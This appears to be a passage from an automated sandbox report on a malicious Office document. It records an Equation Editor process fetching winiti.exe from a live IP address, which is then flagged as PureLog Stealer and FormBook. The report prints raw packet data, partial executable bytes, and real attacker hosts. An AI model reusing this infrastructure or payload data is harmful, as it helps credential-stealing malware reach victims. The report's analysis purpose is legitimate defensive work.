                    Data Ascii: {\rtf1{\*\groupTop920443172 \(}{\664116854/<`?2:~57$-|-+],|2/?5$,;^?+!.8/~]%.6^3/;84#[.?>):5@2=?0??97(+6#+`'5:);*(5??@7;6?&4%:25[756?1?^]&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```664;073*%%,$?3%</''@/_9'?4`_,#1$`>5#*?6<~<'?=;&%0&#?/?*$?&..7]#??~?%,?#8/'&):?4$?77*4*^70?6?-)^_`?9=:%`.|$+?]'0~]_1,;!7~??29`;:?<?_[^?5*@_0_6*,?>;-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@1?,-%?7'<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/%<?#+&_`:3^/'1=2%-'7`%5%.99?6+%`+0?>1$%8_%?%0[)()!<%*?%&~-#9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?0[.00`%3+#4`8.48,>-?_@%>7[!~7?)86,)@*&/?7`!-$%;21>2&<-%[5-/|&+:7@2!4+~`[?=@'=+(?,1/&!|>1.&,5'&|4:*3|7.~+,,=*~@[36%/!&(#&`..?8-1?*(_)_,8#]'=.!?_%?%?,94***?4[-5$$?6==,=''1~%*~.,25~;=7`[<*]87/?.;89[>).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>--#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[;_?@'^>`#1$?%/3^
                    Jul 26, 2024 12:42:42.343827963 CEST1236INData Raw: 3b b5 3d 60 5e b5 24 3e 3c 3f 5e 2e 2e 5d 3a 2b b0 2f 37 2f 37 b5 3c 32 36 24 35 3d 3f 3f 2a 7e 31 39 2d 7c 36 7c 24 3f 35 2f 21 28 35 38 2c 60 3f 2e 36 3a 29 31 5f 35 29 5b 7c 3f 2f 27 2d 30 3a 3a 38 3f b0 39 27 35 32 28 3a 25 7e 32 32 2b 34 29
                    Data Ascii: ;=`^$><?^..]:+/7/7<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?9'52(:%~22+4))&3*(__?`]-?7?[_4!)`.([>_?%?.%|1*0;*0^&8;#_~;7%`>~-48?*:|0]%?`._<[5942/=&3,-%&'|;?&?8*:/<,(1_?=]6$_=|?-=3#1[<$!06`.++!>%?~13#<!(<3_8$7?@!)(;0[@|][|6[
                    Jul 26, 2024 12:42:42.343863964 CEST1236INData Raw: 25 3f 3b 5f 3f 27 33 7c 60 3f 7c 3f 39 40 38 40 2d 2c 5f b5 5d 5f 3f 60 2e a7 40 b5 37 31 30 3f 3f 27 3d 30 24 b5 23 5b b0 3b 2d 35 36 2f 34 21 60 25 23 3e 2a 5f 27 3b 25 3f 3c b5 2b 2f b0 b0 33 37 2d 2e 60 37 2d 24 a7 5b 28 40 2b 3f 35 2d 3f 33
                    Data Ascii: %?;_?'3|`?|?9@8@-,_]_?`.@710??'=0$#[;-56/4!`%#>*_';%?<+/37-.`7-$[(@+?5-?3)(_~+%,?%<[>@;%4-05:?:<3_9%2#-[32?;4::&;@,1_%.6?2*6,?1:$@;4-''5.-*!&&[=-57/~43(?-/783.?7]5+^|#?;8??`1?/`5(*)~738;94?@+_;1)(?~,?9%%%-#%[,<02_$40?0%)-19
                    Jul 26, 2024 12:42:42.343976974 CEST1236INData Raw: 2b 5e 7e 25 26 27 33 36 38 b5 3f 3f 5f 29 37 b5 7c 2e 29 2a 23 2c 38 2f 5f 28 5d 2f 5d 3e 2b 2b 27 34 23 3a 26 30 2d 5f 28 27 25 37 5d 2b 34 2c 5f 24 29 36 3f 3f 3f 5e 3f 2c 27 27 32 30 40 60 23 26 37 b0 2a 5f 21 26 b0 34 a7 36 25 34 39 2b 33 7e
                    Data Ascii: +^~%&'368??_)7|.)*#,8/_(]/]>++'4#:&0-_('%7]+4,_$)6???^?,''20@`#&7*_!&46%49+3~:?)?|`?_4:]%9=%&>)~7(4(26*72??0#3#'>'?[%`)]1~%#%,-<|:-!(?_!129$`+<?0!_&7?)90?=<))+&<96[>(5:?[*/)/5?5?`:??;':%<=];?([;|()'[|&*=2-?%6_%(^_&30<!?|?'#31%?
                    Jul 26, 2024 12:42:42.344010115 CEST1236INData Raw: 20 20 20 09 20 09 20 20 20 20 20 20 09 20 20 09 20 20 20 09 30 30 30 30 0a 0a 0d 0d 0a 0d 0d 0d 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0a 0d 30 09 20 20 20 20 20 09 09 20 20 09 09 20 20 09 09 09 09 20 20 20 20 09 09 20 20 20 09 20 20 20 20 20 09 09 20
                    Data Ascii: 00000 00 b0
                    Jul 26, 2024 12:42:42.344043970 CEST1236INData Raw: 0a 0d 0a 0a 0a 0d 0d 0a 0a 0a 0a 0d 0a 0d 0a 0a 0a 0a 0d 0d 31 30 09 09 20 20 20 20 09 09 20 09 20 09 09 09 09 20 09 09 09 20 20 09 20 20 20 20 09 20 20 20 20 20 20 20 09 09 09 09 20 09 20 09 20 09 09 09 09 09 09 20 20 20 09 20 09 20 09 20 20 20
                    Data Ascii: 10 88c b7
                    Jul 26, 2024 12:42:42.344080925 CEST1236INData Raw: 20 09 09 09 20 20 20 09 09 09 09 20 09 20 09 20 09 20 20 09 09 20 20 09 38 09 09 20 20 09 20 20 09 09 09 09 20 09 09 20 20 20 20 20 09 09 20 09 09 20 20 09 20 09 20 20 09 20 09 09 09 09 20 20 20 09 20 09 09 20 09 09 09 20 20 20 09 09 09 09 20 09
                    Data Ascii: 8 5 5ff
                    Jul 26, 2024 12:42:42.344558001 CEST1236INData Raw: 09 20 09 09 20 09 20 09 09 20 09 20 09 20 09 09 20 20 09 20 20 09 09 09 09 20 09 09 20 20 20 09 09 09 20 20 09 09 09 20 20 20 20 20 09 09 09 09 09 09 09 20 20 09 09 39 0a 0a 0d 0d 0d 0a 0a 0a 0d 0a 0a 0a 0d 0d 0d 0a 0a 0d 0a 0a 0d 62 09 20 20 20
                    Data Ascii: 9b 2 6
                    Jul 26, 2024 12:42:42.344592094 CEST1236INData Raw: 0d 37 0a 0d 0a 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0a 0a 0d 0d 61 63 38 09 09 09 09 20 09 20 09 20 09 20 20 09 20 09 09 20 20 20 09 20 09 20 20 09 09 20 09 09 20 09 09 09 09 20 20 20 20 09 20 20 09 09 09 20 20 20 09 09 20 09 09 20 09 09 09
                    Data Ascii: 7ac8 e f 80
                    Jul 26, 2024 12:42:42.344628096 CEST1236INData Raw: 20 20 09 09 20 20 09 20 20 20 20 09 09 20 09 20 09 20 20 20 20 20 09 20 09 09 09 20 20 20 20 20 09 20 20 09 09 09 20 09 09 20 09 09 20 20 20 20 09 09 09 64 62 0d 0d 0d 0a 0d 0a 0d 0a 0a 0a 0d 0a 0a 0d 0a 0d 0a 0a 0d 0d 0d 39 38 37 20 09 20 09 09
                    Data Ascii: db987 fd281 b2
                    Jul 26, 2024 12:42:42.350599051 CEST1236INData Raw: 09 20 20 20 20 20 20 09 20 20 09 09 20 09 09 20 20 09 20 20 20 20 09 09 20 20 09 20 09 09 09 20 20 09 09 09 20 09 09 20 20 20 09 09 09 20 20 09 20 20 09 09 09 66 0a 0a 0d 0a 0a 0d 0d 0a 0a 0a 0d 0d 0a 0a 0a 0d 0a 0d 0d 0d 0d 66 20 20 09 20 09 09
                    Data Ascii: ff b 0e3


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.2249165188.114.96.3803136C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 12:42:42.869848967 CEST129OUTOPTIONS / HTTP/1.1
                    User-Agent: Microsoft Office Protocol Discovery
                    Host: tny.wtf
                    Content-Length: 0
                    Connection: Keep-Alive
                    Jul 26, 2024 12:42:43.420758963 CEST562INHTTP/1.1 404 Not Found
                    Date: Fri, 26 Jul 2024 10:42:43 GMT
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uulhEEiOXoGYlZKlmb7SClhCYxU3NtgRhPNKtJluJpWOvx9ZuS%2Br%2FBuSb0b09MXIxBNU3%2BrDH%2Fx63ADu3v8wftWYGOO2kAeRv0Ygjnlbg3OOOf2BmotdEBOM"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c8dc7946c431-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                    Jul 26, 2024 12:42:44.622416973 CEST129OUTOPTIONS / HTTP/1.1
                    User-Agent: Microsoft Office Protocol Discovery
                    Host: tny.wtf
                    Content-Length: 0
                    Connection: Keep-Alive
                    Jul 26, 2024 12:42:44.765628099 CEST566INHTTP/1.1 404 Not Found
                    Date: Fri, 26 Jul 2024 10:42:44 GMT
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=El%2Br9sSKHqmmdHwhLPqywED1VjWGqYnttXLHjgYMPuW9%2FtpQHKub02g89K8uueu1%2BQYXwsUFO%2FqG5NSlk0rGVTUWs5iyDMzalfipJkR9ovf%2FMT8kYr7VV%2Bd2"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c8e53feac431-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                    Jul 26, 2024 12:42:44.774807930 CEST129OUTOPTIONS / HTTP/1.1
                    User-Agent: Microsoft Office Protocol Discovery
                    Host: tny.wtf
                    Content-Length: 0
                    Connection: Keep-Alive
                    Jul 26, 2024 12:42:44.915788889 CEST568INHTTP/1.1 404 Not Found
                    Date: Fri, 26 Jul 2024 10:42:44 GMT
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OyO6%2BzgN0Mm%2BV44JN4%2FyHHrzm9PgUI%2B%2Bcys2y5e6Xp6cajkzVZEGkoCNBI89MNUniNZwquOUZ0JL4blO%2B6ltgVzh%2FKssGJdZqdVIzHxH6YD4lH0nYymppcTz"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c8e62886c431-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                    Jul 26, 2024 12:42:49.650374889 CEST130OUTHEAD /dGa HTTP/1.1
                    User-Agent: Microsoft Office Existence Discovery
                    Host: tny.wtf
                    Content-Length: 0
                    Connection: Keep-Alive
                    Jul 26, 2024 12:42:49.791309118 CEST548INHTTP/1.1 405 Method Not Allowed
                    Date: Fri, 26 Jul 2024 10:42:49 GMT
                    Connection: keep-alive
                    Allow: GET
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AT9zPKKjY81AxQmlnYYgngX9sNs%2F4CaEydLAwdHqfmyygszYBjk%2FAEyLmajsXve2qqUcsXnYXhSMRAcpfJpUfSb9SdDCv%2BrmmqGXuvNKC60aWcvuTNhzShAX"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c904ad14c431-EWR
                    alt-svc: h3=":443"; ma=86400


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.2249166188.114.97.3803136C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 12:42:44.986799955 CEST111OUTHEAD /dGa HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Microsoft Office Existence Discovery
                    Host: tny.wtf
                    Jul 26, 2024 12:42:45.585127115 CEST546INHTTP/1.1 405 Method Not Allowed
                    Date: Fri, 26 Jul 2024 10:42:45 GMT
                    Connection: keep-alive
                    Allow: GET
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWdS2XNbEBneXq5fUSS1Q%2FYw3G8pimKHHXQF50Ic8glBlEsie3JHIIDzk5PsXLwYMDLmTFsFrAxSYJVw46yciaUDX84Hk%2FV4igsyqCgKU3J4IjoNO7hKl940"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c8e9f9bb42d1-EWR
                    alt-svc: h3=":443"; ma=86400
                    Jul 26, 2024 12:42:45.797523022 CEST546INHTTP/1.1 405 Method Not Allowed
                    Date: Fri, 26 Jul 2024 10:42:45 GMT
                    Connection: keep-alive
                    Allow: GET
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWdS2XNbEBneXq5fUSS1Q%2FYw3G8pimKHHXQF50Ic8glBlEsie3JHIIDzk5PsXLwYMDLmTFsFrAxSYJVw46yciaUDX84Hk%2FV4igsyqCgKU3J4IjoNO7hKl940"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c8e9f9bb42d1-EWR
                    alt-svc: h3=":443"; ma=86400


                    Session IDSource IPSource PortDestination IPDestination Port
                    4192.168.2.2249167188.114.97.380
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 12:42:48.992865086 CEST124OUTOPTIONS / HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                    translate: f
                    Host: tny.wtf
                    Jul 26, 2024 12:42:49.566781044 CEST566INHTTP/1.1 404 Not Found
                    Date: Fri, 26 Jul 2024 10:42:49 GMT
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWapKren%2FOs5%2F5eohyukmtsXHWSC1mFOvG3cz%2BxV5nO43wK1zPVKyYK%2F%2FDggmUyTaiz7BojaE1u5ZY7gahkitPMRKlYG%2FZeAoNUuVI3AzIs8mP0hxWao4om2"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c902d92732e2-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0
                    Jul 26, 2024 12:42:49.778326988 CEST566INHTTP/1.1 404 Not Found
                    Date: Fri, 26 Jul 2024 10:42:49 GMT
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    X-Powered-By: ASP.NET
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HWapKren%2FOs5%2F5eohyukmtsXHWSC1mFOvG3cz%2BxV5nO43wK1zPVKyYK%2F%2FDggmUyTaiz7BojaE1u5ZY7gahkitPMRKlYG%2FZeAoNUuVI3AzIs8mP0hxWao4om2"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a93c902d92732e2-EWR
                    alt-svc: h3=":443"; ma=86400
                    Data Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.2249168104.219.239.104803316C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 12:42:50.160085917 CEST315OUTGET /80/winiti.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 104.219.239.104
                    Connection: Keep-Alive
                    Jul 26, 2024 12:42:50.731895924 CEST1236INHTTP/1.1 200 OK
                    Date: Fri, 26 Jul 2024 10:42:50 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                    Last-Modified: Tue, 16 Jul 2024 19:13:36 GMT
                    ETag: "e8400-61d6224798859"
                    Accept-Ranges: bytes
                    Content-Length: 951296
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/x-msdownload
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 c6 96 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 78 0e 00 00 0a 00 00 00 00 00 00 1e 96 0e 00 00 20 00 00 00 a0 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c9 95 0e 00 4f 00 00 00 00 a0 0e 00 18 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 28 6d 0e 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`f0x @ @O(mT H.text$v x `.rsrcz@@.reloc@BHLUIPZ}rp}}((*}rp}}((}*0rpsorpssso&oo}{{oo( &o!*_b tw0{rpo"{rpo"{
                    Jul 26, 2024 12:42:50.731924057 CEST1236INData Raw: 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 1d 00 00 04 02 7b 1e 00 00 04 16 25 0a 6f 23 00 00 0a 00 06 6f 23 00 00 0a 00 02 7b 12 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 11 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b 17 00 00 04 72
                    Data Ascii: rpo"{{%o#o#{rpo"{rpo"{rpo"{rpo"{"{!%o#o#{rpo"*&(*0k{'o${o${o${o${o$
                    Jul 26, 2024 12:42:50.731941938 CEST1236INData Raw: 27 00 00 04 16 6f 24 00 00 0a 00 02 7b 06 00 00 04 17 6f 24 00 00 0a 00 02 7b 14 00 00 04 17 6f 24 00 00 0a 00 02 7b 13 00 00 04 17 6f 24 00 00 0a 00 02 7b 15 00 00 04 17 6f 24 00 00 0a 00 02 7b 28 00 00 04 16 6f 24 00 00 0a 00 02 7b 2a 00 00 04
                    Data Ascii: 'o${o${o${o${o${(o${*o$*0{o%rp(09{o%rp(09{o%rp(09{o1-{o19{o%rp(0,v{o
                    Jul 26, 2024 12:42:50.732148886 CEST672INData Raw: 20 00 00 0a 26 00 de 00 2a 01 10 00 00 00 00 01 00 39 3a 00 11 20 00 00 01 13 30 02 00 2b 00 00 00 02 00 00 11 00 03 2c 0b 02 7b 05 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 05 00 00 04 6f 36 00 00 0a 00 00 02 03 28 37 00 00 0a 00 2a 00 13
                    Data Ascii: &*9: 0+,{+,{o6(7*0(8s9s:}s;}s<}s<}s;}s<}s;}s<}s;}s<}s<}s;}
                    Jul 26, 2024 12:42:50.732156992 CEST1236INData Raw: 00 02 7b 06 00 00 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 06 00 00 04 72 bf 05 00 70 6f 4c 00 00 0a 00 02 7b 06 00 00 04 17 6f 4d 00 00 0a 00 02 7b 06 00 00 04 1f 33 6f 4e 00 00 0a 00 02 7b 06 00 00 04 6f 4f 00 00 0a 1f 18 6f 50 00
                    Data Ascii: {sJoK{rpoL{oM{3oN{oOoP{oQ{ d sRoS{oT{sUoV{rp"AsWoX{sHoI{sJoK{rp
                    Jul 26, 2024 12:42:50.732172966 CEST1236INData Raw: 02 7b 0e 00 00 04 72 bd 06 00 70 6f 4c 00 00 0a 00 02 7b 0e 00 00 04 20 05 03 00 00 1f 23 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 0e 00 00 04 1d 6f 54 00 00 0a 00 02 7b 0e 00 00 04 02 fe 06 0d 00 00 06 73 5b 00 00 0a 6f 5c 00 00 0a 00 02 7b 0f 00
                    Data Ascii: {rpoL{ #sRoS{oT{s[o\{oY{rp"AsZoX{ sHoI{sJoK{rpoL{ sRoS{oT{rpo"{
                    Jul 26, 2024 12:42:50.732187986 CEST448INData Raw: 00 00 0a 00 02 7b 15 00 00 04 02 fe 06 08 00 00 06 73 5b 00 00 0a 6f 62 00 00 0a 00 02 7b 16 00 00 04 17 6f 59 00 00 0a 00 02 7b 16 00 00 04 72 d9 05 00 70 22 00 00 90 41 17 73 5a 00 00 0a 6f 58 00 00 0a 00 02 7b 16 00 00 04 1f 09 20 66 02 00 00
                    Data Ascii: {s[ob{oY{rp"AsZoX{ fsHoI{sJoK{rpoL{_sRoS{oT{rpo"{rp"AsWoX{ sHoI{
                    Jul 26, 2024 12:42:50.732203007 CEST1236INData Raw: 0a 00 02 7b 18 00 00 04 72 09 08 00 70 6f 22 00 00 0a 00 02 7b 19 00 00 04 72 d9 05 00 70 22 00 00 90 41 18 19 16 73 57 00 00 0a 6f 58 00 00 0a 00 02 7b 19 00 00 04 18 20 0e 01 00 00 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 19 00 00 04 18 18 18 18
                    Data Ascii: {rpo"{rp"AsWoX{ sHoI{sJoK{oc{rpoL{ TCsRoS{oT{oY{rp"AsZoX{ sHoI{sJoK
                    Jul 26, 2024 12:42:50.732222080 CEST1236INData Raw: 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 20 00 00 04 72 ab 08 00 70 6f 4c 00 00 0a 00 02 7b 20 00 00 04 20 53 01 00 00 1f 21 73 52 00 00 0a 6f 53 00 00 0a 00 02 7b 20 00 00 04 1f 1c 6f 54 00 00 0a 00 02 7b 21 00 00 04 17 6f 59 00 00
                    Data Ascii: sJoK{ rpoL{ S!sRoS{ oT{!oY{!rp"AsWoX{!hsHoI{!sJoK{!rpoL{!?!sRoS{!oT{!od{!r4po"{!
                    Jul 26, 2024 12:42:50.732758045 CEST448INData Raw: 0a 02 7b 19 00 00 04 6f 66 00 00 0a 00 02 7b 27 00 00 04 16 6f 24 00 00 0a 00 02 7b 27 00 00 04 20 a4 00 00 00 20 7c 01 00 00 73 48 00 00 0a 6f 49 00 00 0a 00 02 7b 27 00 00 04 18 18 18 18 73 4a 00 00 0a 6f 4b 00 00 0a 00 02 7b 27 00 00 04 72 6d
                    Data Ascii: {of{'o${' |sHoI{'sJoK{'rmpoL{' e sRoS{'!oT{(o${(rp"AsZoX{( 5 sHoI{(sJoK{(rpoL{(
                    Jul 26, 2024 12:42:50.737852097 CEST1236INData Raw: 7b 29 00 00 04 1f 23 6f 54 00 00 0a 00 02 7b 29 00 00 04 72 a3 09 00 70 6f 22 00 00 0a 00 02 7b 29 00 00 04 17 6f 61 00 00 0a 00 02 7b 29 00 00 04 02 fe 06 0a 00 00 06 73 5b 00 00 0a 6f 62 00 00 0a 00 02 7b 2a 00 00 04 16 6f 24 00 00 0a 00 02 7b
                    Data Ascii: {)#oT{)rpo"{)oa{)s[ob{*o${*rp"AsZoX{* sHoI{*sJoK{*rpoL{* !sRoS{*$oT{*rpo"{*oa{


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:06:42:19
                    Start date:26/07/2024
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f4b0000
                    File size:28'253'536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:3
                    Start time:06:42:41
                    Start date:26/07/2024
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                    Imagebase:0x13f540000
                    File size:1'423'704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:6
                    Start time:06:42:48
                    Start date:26/07/2024
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:8
                    Start time:06:42:51
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Roaming\winiti.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                    Imagebase:0x300000
                    File size:951'296 bytes
                    MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.450826441.00000000005C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.450903406.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:9
                    Start time:06:42:51
                    Start date:26/07/2024
                    Path:C:\Users\user\AppData\Roaming\winiti.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                    Imagebase:0x300000
                    File size:951'296 bytes
                    MD5 hash:1F5C95D40C06C01300F0A6592945A72D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.522804194.0000000000240000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Code Analysis

                    Call Graph

                    • Entrypoint
                    • Decryption Function
                    • Executed
                    • Not Executed
                    • Show Help
                    callgraph 1 Error: Graph is empty

                    Module: Sheet1

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Sheet1"

                    2

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    Module: Sheet2

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Sheet2"

                    2

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True
